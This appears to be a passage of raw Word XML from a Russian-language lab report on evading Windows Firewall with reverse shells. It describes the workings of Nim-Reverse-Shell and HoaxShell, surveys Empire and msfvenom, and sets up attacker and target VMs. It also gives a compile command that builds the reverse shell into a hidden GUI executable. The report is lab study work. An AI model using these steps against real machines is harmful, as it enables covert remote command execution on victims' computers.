        <w:t xml:space="preserve">который в дальнейшем можно переименовать. Исходный код на деле </w:t>
      </w:r>
      <w:r w:rsidR="00AD0E9A" w:rsidRPr="00AD0E9A">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>реализует простейший удалённый шелл, который позволяет подключённому удалённо клиенту выполнять команды на компьютере, где запущен этот скрипт</w:t>
      </w:r>
      <w:r w:rsidR="00AD0E9A">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103FCC0E" w14:textId="77777777" w:rsidR="00AD0E9A" w:rsidRDefault="00AD0E9A" w:rsidP="00AD0E9A">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Создаётся сокет. Устанавливается </w:t>
      </w:r>
      <w:r>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD0E9A">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>адрес и порт, к которым будет подключаться;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A83F6CB" w14:textId="77777777" w:rsidR="00AD0E9A" w:rsidRDefault="00147EC7" w:rsidP="00AD0E9A">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Пытается подключиться к указанному </w:t>
      </w:r>
      <w:r>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00147EC7">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>и порту. Если подключение успешно, то запускается бесконечный цикл;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339FD56A" w14:textId="77777777" w:rsidR="00442644" w:rsidRDefault="00147EC7" w:rsidP="00442644">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">В цикле отправляет текущую директорию клиенту как приглашение командной строки, получается команду от клиента. В общих случаях выполняет команду через </w:t>
      </w:r>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:r w:rsidRPr="00147EC7">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>и отправляет результат клиенту.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CB0D2A" w14:textId="77777777" w:rsidR="006B01EF" w:rsidRPr="00583F4C" w:rsidRDefault="006B01EF" w:rsidP="00442644">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00442644">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Таким образом, можно удалённо выполнять </w:t>
      </w:r>
      <w:r w:rsidR="00442644" w:rsidRPr="00442644">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">любые </w:t>
      </w:r>
      <w:r w:rsidRPr="00442644">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>команды</w:t>
      </w:r>
      <w:r w:rsidR="00442644" w:rsidRPr="00442644">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> в терминале удалённого компьютера</w:t>
      </w:r>
      <w:r w:rsidR="00583F4C" w:rsidRPr="00583F4C">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00583F4C">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">при этом </w:t>
      </w:r>
      <w:r w:rsidR="00583F4C">
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidR="00C0330B">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Firewall</w:t>
      </w:r>
      <w:r w:rsidR="00583F4C" w:rsidRPr="00583F4C">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00583F4C">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>никак не реагирует на данное подключение и не блокирует его.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C4CCF1" w14:textId="77777777" w:rsidR="00442644" w:rsidRDefault="00583F4C" w:rsidP="00583F4C">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Далее рассмотрим </w:t>
      </w:r>
      <w:r>
        <w:t>HoaxShell</w:t>
      </w:r>
      <w:r w:rsidRPr="00583F4C">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00583F4C">
        <w:t>HoaxShell</w:t>
      </w:r>
      <w:r w:rsidRPr="00583F4C">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> – это инструмент, который используется для создания обратных шеллов</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00583F4C">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>часто в целях тестирования безопасности или в вредоносных сценариях</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">. В целом, процесс подобен </w:t>
      </w:r>
      <w:r>
        <w:t>Nim</w:t>
      </w:r>
      <w:r w:rsidRPr="00583F4C">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>Reverse</w:t>
      </w:r>
      <w:r w:rsidRPr="00583F4C">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>Shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00583F4C">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">. Основная цель </w:t>
      </w:r>
      <w:r w:rsidRPr="00583F4C">
        <w:t>HoaxShell</w:t>
      </w:r>
      <w:r w:rsidRPr="00583F4C">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> – это предоставить возможность удалённого выполнения команд на жертве, которая подключается к атакующему.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Он работает следующим образом:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF6F45E" w14:textId="77777777" w:rsidR="00583F4C" w:rsidRDefault="00583F4C" w:rsidP="00583F4C">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Открывает сокет-соединение с атакующим компьютером</w:t>
      </w:r>
      <w:r w:rsidR="00B003AF">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0609AA8B" w14:textId="77777777" w:rsidR="00E44D6F" w:rsidRDefault="00E44D6F" w:rsidP="00583F4C">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Аналогично принимает</w:t>
      </w:r>
      <w:r w:rsidRPr="00E44D6F">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> люб</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>ые команды, в том числе операционные, от атакующего и выполняет их на жертве</w:t>
      </w:r>
      <w:r w:rsidR="00B003AF">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE05BA8" w14:textId="77777777" w:rsidR="00B003AF" w:rsidRDefault="00B003AF" w:rsidP="00583F4C">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">После выполнения команды </w:t>
      </w:r>
      <w:r>
        <w:t>HoaxShell</w:t>
      </w:r>
      <w:r w:rsidRPr="00B003AF">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>отсылает результат обратно атакующему;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2929089C" w14:textId="77777777" w:rsidR="00B003AF" w:rsidRDefault="00B003AF" w:rsidP="00583F4C">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>HoaxShell</w:t>
      </w:r>
      <w:r w:rsidRPr="00810532">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00810532">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>может работать в фоновом режиме и скрывать свою активность от антивирусных программ или пользователей, также способен замаскировать свою активность под нормальные процессы или приложения.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263C1493" w14:textId="77777777" w:rsidR="00715B33" w:rsidRDefault="00715B33" w:rsidP="00715B33">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Также кратко обсудим другие инструменты создания реверсивной оболочки:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69EE2550" w14:textId="77777777" w:rsidR="00715B33" w:rsidRPr="00715B33" w:rsidRDefault="00715B33" w:rsidP="00715B33">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00715B33">
        <w:t>powershell</w:t>
      </w:r>
      <w:r w:rsidRPr="00715B33">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00715B33">
        <w:t>Empire</w:t>
      </w:r>
      <w:r w:rsidRPr="00715B33">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E868D6">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00715B33">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> фреймворк для постэксплуатации, использует </w:t>
      </w:r>
      <w:r w:rsidRPr="00715B33">
        <w:t>PowerShell</w:t>
      </w:r>
      <w:r w:rsidRPr="00715B33">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> для создания агентов на заражённых машинах, позволяет управлять ими, выполнять команды, загружать файлы, использовать модули для привилегий, распространения и устойчивости. Работает через </w:t>
      </w:r>
      <w:r w:rsidRPr="00715B33">
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00715B33">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidRPr="00715B33">
        <w:t>HTTPS</w:t>
      </w:r>
      <w:r w:rsidRPr="00715B33">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>, поддерживает шифрование и обход обнаружения.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701A6D10" w14:textId="77777777" w:rsidR="005E3BA7" w:rsidRDefault="00E868D6" w:rsidP="00EE7CFF">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E868D6">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">msfvenom </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00E868D6">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> часть </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">фреймворка </w:t>
      </w:r>
      <w:r w:rsidRPr="00E868D6">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Metasploit Framework, предназначена для</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> генерации полезной нагрузки</w:t>
      </w:r>
      <w:r w:rsidRPr="00E868D6">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> и их упаковки в различные форматы (exe, dll). Позволяет создавать исполняемые файлы с встроенным шеллом, которые при запуске подключаются к атакующему и дают удалённый доступ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D6FA72" w14:textId="77777777" w:rsidR="009B1A98" w:rsidRPr="009B1A98" w:rsidRDefault="009B1A98" w:rsidP="009B1A98">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Результаты теоретического анализа</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1252B62B" w14:textId="77777777" w:rsidR="00EE7CFF" w:rsidRPr="00EE7CFF" w:rsidRDefault="00EE7CFF" w:rsidP="00EE7CFF">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE7CFF">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Проведённый теоретический анализ продемонстрировал, что современные инструменты создания реверсивных оболочек обладают высокой степенью адаптивности и способны обходить стандартные средства защиты, такие как Windows Firewall. Рассмотренные решения — Nim-Reverse-Shell и HoaxShell — обладают минимальной активностью, легко маскируются под легитимные процессы и потенциально могут оставаться незамеченными системой безопасности.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Исходя из этого, вероятно, </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE7CFF">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">при использовании указанных реверсивных оболочек на целевой системе с включённым Windows </w:t>
      </w:r>
      <w:r>
        <w:t>Firewall</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE7CFF">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>, подключение с атакующей машины будет установлено успешно, без блокировок и уведомлений со стороны защитных механизмов.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Предположительно </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE7CFF">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">наиболее эффективным способом обхода станет использование HoaxShell, благодаря его способности маскироваться и работать через легитимные каналы (например, PowerShell), в то время как Nim-Reverse-Shell может быть замечен при ручной проверке запущенных процессов, но всё ещё останется незамеченным </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>файрволом</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE7CFF">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A233F6E" w14:textId="77777777" w:rsidR="00C148FC" w:rsidRDefault="00C148FC" w:rsidP="00C148FC">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Практическая часть</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05450E18" w14:textId="77777777" w:rsidR="004215AA" w:rsidRDefault="004215AA" w:rsidP="004215AA">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004215AA">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Для оценки возможностей обхода Windows Firewall были подготовлены две виртуальные машины:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453A6BDC" w14:textId="77777777" w:rsidR="004215AA" w:rsidRPr="004215AA" w:rsidRDefault="004215AA" w:rsidP="004215AA">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004215AA">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>– Атакующая: Ubuntu 22.04 LTS, IP 192.168.0.192</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D48B927" w14:textId="3549139E" w:rsidR="004215AA" w:rsidRPr="00BE00F9" w:rsidRDefault="004215AA" w:rsidP="006647F8">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00BE00F9">
        <w:t xml:space="preserve">– </w:t>
      </w:r>
      <w:r w:rsidRPr="004215AA">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Целевая</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE00F9">
        <w:t xml:space="preserve">: Windows 11 </w:t>
      </w:r>
      <w:r>
        <w:t>Home</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE00F9">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="004215AA">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>сборка</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE00F9">
        <w:t xml:space="preserve"> 10.0.22621</w:t>
      </w:r>
      <w:r w:rsidR="00BE00F9" w:rsidRPr="00BE00F9">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00BE00F9">
        <w:t xml:space="preserve">build </w:t>
      </w:r>
      <w:r w:rsidR="00BE00F9" w:rsidRPr="00BE00F9">
        <w:t>22621</w:t>
      </w:r>
      <w:r w:rsidR="00BE00F9">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F3EC08" w14:textId="77777777" w:rsidR="00686DA9" w:rsidRDefault="00686DA9" w:rsidP="00EA21F2">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00686DA9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">1 способ: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Обход с помощью </w:t>
      </w:r>
      <w:r>
        <w:t>Nim</w:t>
      </w:r>
      <w:r w:rsidRPr="00B9711F">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>Reverse</w:t>
      </w:r>
      <w:r w:rsidRPr="00B9711F">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>Shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB2A0E2" w14:textId="77777777" w:rsidR="003C062F" w:rsidRDefault="00E7358E" w:rsidP="003C062F">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Для начала</w:t>
      </w:r>
      <w:r w:rsidRPr="00E7358E">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">скомпилируем наш </w:t>
      </w:r>
      <w:r>
        <w:t>Nim</w:t>
      </w:r>
      <w:r w:rsidRPr="00E7358E">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">файл с </w:t>
      </w:r>
      <w:r>
        <w:t>reverse</w:t>
      </w:r>
      <w:r w:rsidRPr="00E7358E">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r w:rsidRPr="00E7358E">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>.exe бинарный файл</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>. Для этого воспользуемся следующей командой</w:t>
      </w:r>
      <w:r w:rsidR="003C062F" w:rsidRPr="003C062F">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D2DDDD" w14:textId="77777777" w:rsidR="00E7358E" w:rsidRDefault="003C062F" w:rsidP="003C062F">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003C062F">
        <w:t>nim c -d:mingw --app:gui --opt:speed --o:</w:t>
      </w:r>
      <w:r>
        <w:t>file</w:t>
      </w:r>
      <w:r w:rsidRPr="003C062F">
        <w:t>.exe reverse_shell.nim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C962002" w14:textId="77777777" w:rsidR="003C062F" w:rsidRDefault="003C062F" w:rsidP="003C062F">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">Где </w:t>
      </w:r>
      <w:r w:rsidRPr="003C062F">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>-d:mingw указывает на использование mingw для компиляции</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="003C062F">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>--app:gui внедряет процесс, чтобы shell не терялся при закрытии командной строки</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="003C062F">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>--opt:speed оптимизирует для скорости</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="003C062F">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>--</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="003C062F">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t>file</w:t>
      </w:r>
      <w:r w:rsidRPr="003C062F">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>.exe задает имя выходного файла.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4656B375" w14:textId="77777777" w:rsidR="003C062F" w:rsidRPr="00C0330B" w:rsidRDefault="003C062F" w:rsidP="003C062F">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Далее необходимо перенести скомпилированный </w:t>
      </w:r>
      <w:r>
        <w:t>file</w:t>
      </w:r>
      <w:r w:rsidRPr="003C062F">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t>exe</w:t>
      </w:r>
      <w:r w:rsidRPr="003C062F">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">на машину </w:t>
      </w:r>
      <w:r>
        <w:t>Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">. Для этого на атакующей машине запустим простой </w:t>
      </w:r>
      <w:r>
        <w:t>http</w:t>
      </w:r>
      <w:r w:rsidRPr="003C062F">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>сервер с помощью команды</w:t>
      </w:r>
      <w:r w:rsidRPr="003C062F">
        <w:rPr>
